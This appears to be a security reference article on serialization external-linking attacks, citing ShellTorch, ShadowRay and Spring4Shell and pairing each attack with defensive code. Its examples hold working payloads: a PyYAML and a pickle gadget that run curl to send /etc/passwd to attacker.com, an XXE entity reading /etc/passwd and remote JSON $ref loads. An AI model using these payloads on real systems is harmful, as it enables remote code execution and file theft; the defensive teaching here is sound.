Serialized Data External Linking

Serialized Data External Linking is a subtechnique of Request Forgery where attackers exploit serialization mechanisms to force applications into loading or processing data from external sources. This technique is particularly dangerous in modern applications that use serialization formats like YAML, JSON, or XML for configuration and data exchange. When successful, external linking attacks can lead to remote code execution, data exfiltration, or service compromise by tricking applications into processing malicious external resources.

Examples in the Wild

Notable External Linking Attacks:

ShellTorch (CVE-2023-43654) The ShellTorch vulnerability chain demonstrated exploitation of external linking in PyTorch's TorchServe framework. A server-side request forgery flaw in the management API (CVE-2023-43654) let attackers load model archives from arbitrary remote URLs, and unsafe YAML deserialization in the bundled SnakeYAML library (CVE-2022-1471) turned a malicious model configuration into remote code execution:

  • Affected TorchServe deployments on major cloud AI platforms (Google Cloud AI, AWS SageMaker, Azure ML)
  • Exploited model configuration loading
  • Chained SSRF with unsafe deserialization for greater impact
  • Exposed hosted models and sensitive data to theft

ShadowRay Attack The ShadowRay attack leveraged external linking in Ray's distributed training infrastructure to:

  • Load malicious model configurations
  • Access sensitive training data
  • Exfiltrate proprietary models
  • Compromise training pipelines

Spring Framework RCE (CVE-2022-22965) The Spring4Shell vulnerability demonstrated how external linking in data binding could lead to RCE:

  • Affected Spring Framework 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19, plus older unsupported versions
  • Exploited class loading mechanisms
  • Allowed arbitrary code execution
  • Impacted numerous enterprise applications

Attack Mechanism

Common External Linking Techniques:

  1. YAML External Entity Loading

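    # Malicious YAML configuration (!include is a custom tag that some loaders implement)
    model_config: !include http://attacker.com/malicious.yml
    
    ---
    # Or more directly, as a separate document using PyYAML's unsafe Python tags:
    !!python/object/apply:os.system
    - 'curl http://attacker.com/exfil?data=$(cat /etc/passwd)'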
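
One way to reduce exposure to payloads like these is to reject documents that carry non-core YAML tags before they reach a parser. The sketch below is a heuristic pre-parse scan that uses only the Python standard library. `find_suspicious_tags` and `CORE_TAGS` are hypothetical names, and the regular expression only approximates YAML tag syntax, so it can produce false positives (for example, on quoted strings). It is meant to complement a safe loader such as PyYAML's `yaml.safe_load`, which refuses `!!python/...` tags, not to replace it.

```python
import re

# Approximation of a YAML tag: "!" or "!!" followed by a name, at the start of a
# line or after whitespace or flow/mapping punctuation. Not a full YAML parser.
TAG_PATTERN = re.compile(r"(?:^|[\s\[{,:-])(!{1,2}[A-Za-z<][^\s,\]}]*)")

# Hypothetical allowlist of plain-data tags that are considered harmless.
CORE_TAGS = {"!!str", "!!int", "!!float", "!!bool", "!!null", "!!map", "!!seq"}


def find_suspicious_tags(yaml_text):
    """Return (line_number, tag) pairs for every tag outside CORE_TAGS."""
    hits = []
    for lineno, line in enumerate(yaml_text.splitlines(), start=1):
        code = line.split(" #", 1)[0]  # crude removal of trailing comments
        if code.lstrip().startswith("#"):
            continue  # whole-line comment
        for match in TAG_PATTERN.finditer(code):
            tag = match.group(1)
            if tag not in CORE_TAGS:
                hits.append((lineno, tag))
    return hits
```

A caller would refuse to parse any document for which `find_suspicious_tags` returns a non-empty list and log the offending line numbers.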
    

  2. XML External Entity (XXE)

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE data [
        <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <config>
        <setting>&xxe;</setting>
    </config>
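
A common mitigation for the payload above is to refuse any document that declares a DOCTYPE, since entity definitions can only appear inside one. The following is a minimal sketch using the standard library's expat bindings. `parse_without_dtd` and `DTDForbidden` are hypothetical names, and the policy is deliberately strict: it also rejects benign DOCTYPE declarations.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it sees "<!DOCTYPE", before any entity
    # declared in the internal subset is processed.
    raise DTDForbidden(f"DOCTYPE declarations are not allowed (name: {name!r})")


def parse_without_dtd(xml_text):
    """Parse xml_text into an Element, rejecting documents that carry a DTD."""
    # First pass: walk the document with expat and abort on any DOCTYPE.
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)
    # Second pass: only DTD-free documents reach the real parser.
    return ET.fromstring(xml_text)
```

Parsing twice is a simplification that keeps the check separate from the application's own parser. Malformed XML still raises `xml.parsers.expat.ExpatError` from the first pass.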
    

  3. JSON Schema Reference

    {
        "$schema": "http://attacker.com/schema.json",
        "type": "object",
        "properties": {
            "malicious": {
                "$ref": "http://attacker.com/payload.json"
            }
        }
    }
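
Before handing a schema like this to a validator that resolves remote references, the document can be walked to list every `$ref` or `$schema` value that points outside a trusted set of hosts. This is a sketch under assumptions: `find_untrusted_refs` is a hypothetical helper, and `ALLOWED_HOSTS` contains a made-up internal host. Many validators treat `$schema` purely as an identifier and never fetch it, so flagging it is a conservative choice.

```python
from urllib.parse import urlparse

# Hypothetical allowlist of hosts that schemas may be loaded from.
ALLOWED_HOSTS = {"schemas.example.internal"}


def find_untrusted_refs(node, path="$"):
    """Return (json_path, url) pairs for references to non-allowlisted hosts."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key in ("$ref", "$schema") and isinstance(value, str):
                parsed = urlparse(value)
                # Local references such as "#/definitions/x" have no scheme.
                if parsed.scheme and parsed.hostname not in ALLOWED_HOSTS:
                    hits.append((child, value))
            else:
                hits.extend(find_untrusted_refs(value, child))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            hits.extend(find_untrusted_refs(item, f"{path}[{index}]"))
    return hits
```

Applied to the example above, the function reports both the `$schema` and the nested `$ref` entries, because neither host is on the allowlist.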
    

  4. Python Pickle Exploitation

    # Malicious pickle payload
    import os
    import pickle
    
    class Evil:
        def __reduce__(self):
            # On unpickling, pickle calls os.system with this command
            return (os.system, ('curl http://attacker.com/exfil?data=$(cat /etc/passwd)',))
    
    # Serialized and sent to target
    payload = pickle.dumps(Evil())
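
When pickle cannot be avoided, the set of globals a payload may reference can be restricted by overriding `Unpickler.find_class`, the approach described in the Python documentation. The sketch below assumes a small, hypothetical allowlist (`ALLOWED_GLOBALS`). `AllowlistUnpickler` and `restricted_loads` are illustrative names, not part of any library.

```python
import io
import pickle

# Hypothetical allowlist: the only globals this application expects in a pickle.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream references a global such as
        # os.system; anything not explicitly allowed is rejected.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")


def restricted_loads(data):
    """Drop-in replacement for pickle.loads() that enforces the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

With this in place, the `Evil` payload above fails with `pickle.UnpicklingError` before `os.system` is ever looked up, while plain containers of basic types still load. Restricting globals narrows the attack surface but does not make untrusted pickles safe in general.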
    

Detection Challenges

Why Traditional Security Tools Fail:

  1. Format Diversity

    # Multiple serialization formats
    data_formats:
      - yaml: "complex resolution"
      - xml: "entity expansion"
      - json: "schema references"
      - pickle: "code execution"
      # How to handle all formats?
    

  2. Resolution Complexity

    # Resource resolution
    external_resources:
      - http: "remote loading"
      - file: "local access"
      - custom: "protocol handlers"
      # How to track resolution?
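
One partial answer to the tracking question is to route every reference through a single checkpoint that applies a scheme and host allowlist and logs each decision. The sketch below uses only the standard library. `check_reference`, the logger name, and the allowlisted host are assumptions made for illustration.

```python
import logging
from urllib.parse import urlparse

log = logging.getLogger("reference_resolution")

# Hypothetical policy: only HTTPS, and only one internal configuration host.
ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"config.example.internal"}


def check_reference(url):
    """Return (allowed, reason) for a reference and log the decision."""
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    host = (parsed.hostname or "").lower()
    if scheme not in ALLOWED_SCHEMES:
        verdict = (False, f"scheme '{scheme}' is not allowed")
    elif host not in ALLOWED_HOSTS:
        verdict = (False, f"host '{host}' is not on the allowlist")
    else:
        verdict = (True, "ok")
    log.info("reference=%s allowed=%s reason=%s", url, *verdict)
    return verdict
```

A check like this covers `http:`, `file:`, and custom schemes uniformly. It does not cover redirects or DNS rebinding, so the code that performs the fetch would also need to refuse redirects or re-validate the final destination.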
    

  3. Context Sensitivity

    # Context variations
    usage_contexts:
      - config_loading: "startup"
      - data_processing: "runtime"
      - api_requests: "dynamic"
      # When to validate?
    

Required Application Security Strategy:

# External linking protection
- rule: "Resource Resolution"
  condition: |
    data.contains_external_reference AND
    reference.source_not_trusted AND
    reference.protocol_dangerous
  severity: critical

# Format validation
- rule: "Format Security"
  condition: |
    format.allows_code_execution OR
    format.enables_file_access OR
    format.permits_network_calls
  severity: high

# Runtime protection
- rule: "Runtime Control"
  condition: |
    runtime.loading_external_resource OR
    runtime.resolving_reference OR
    runtime.executing_loaded_code
  severity: critical
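
The rules above are written as pseudo-configuration. One way to read them is as boolean combinations over named facts that a scanner or runtime agent collects. The sketch below shows that reading. The `Rule` dataclass, the `evaluate` function, and the idea of passing facts as a dictionary are assumptions for illustration, not an existing rule engine.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    conditions: tuple  # fact names taken from the rule text
    mode: str          # "all" for AND-joined rules, "any" for OR-joined rules


RULES = (
    Rule("Resource Resolution", "critical",
         ("data.contains_external_reference",
          "reference.source_not_trusted",
          "reference.protocol_dangerous"), "all"),
    Rule("Format Security", "high",
         ("format.allows_code_execution",
          "format.enables_file_access",
          "format.permits_network_calls"), "any"),
    Rule("Runtime Control", "critical",
         ("runtime.loading_external_resource",
          "runtime.resolving_reference",
          "runtime.executing_loaded_code"), "any"),
)


def evaluate(facts):
    """Return (rule_name, severity) for each rule whose condition holds."""
    fired = []
    for rule in RULES:
        # Facts that were never reported are treated as False.
        values = [bool(facts.get(name, False)) for name in rule.conditions]
        matched = all(values) if rule.mode == "all" else any(values)
        if matched:
            fired.append((rule.name, rule.severity))
    return fired
```

Note the asymmetry: "Resource Resolution" fires only when all three facts hold, while the other two rules fire on any single fact.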

Key Detection Requirements:

  1. Resource Validation
     • Source verification
     • Protocol restriction
     • Content validation

  2. Format Control
     • Safe deserialization
     • Reference limitation
     • Execution prevention

  3. Runtime Monitoring
     • Resource loading tracking
     • Reference resolution logging
     • Execution context validation
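
For the runtime monitoring requirement, Python 3.8 and later expose audit hooks that report events such as global lookups during unpickling and outbound connections. The sketch below records a handful of events in memory. `WATCHED_EVENTS`, `observed`, and `_record` are hypothetical names, and a real deployment would forward events to its logging pipeline rather than keep them in a list. Audit hooks cannot be removed once installed, so this would normally run once at process start.

```python
import sys

# Events relevant to external linking; all are documented CPython audit events.
WATCHED_EVENTS = {
    "pickle.find_class",   # a pickle stream referenced a global
    "urllib.Request",      # urllib opened a URL
    "socket.connect",      # an outbound socket connection was attempted
    "os.system",           # a shell command was run
    "subprocess.Popen",    # a child process was spawned
}

observed = []  # (event_name, repr_of_arguments) pairs, in order of occurrence


def _record(event, args):
    if event in WATCHED_EVENTS:
        # Store a string so the hook does not keep live objects alive.
        observed.append((event, repr(args)))


sys.addaudithook(_record)
```

Raising an exception inside the hook aborts the audited operation, which turns the same mechanism from logging into enforcement. That trade-off depends on how much breakage the application can tolerate.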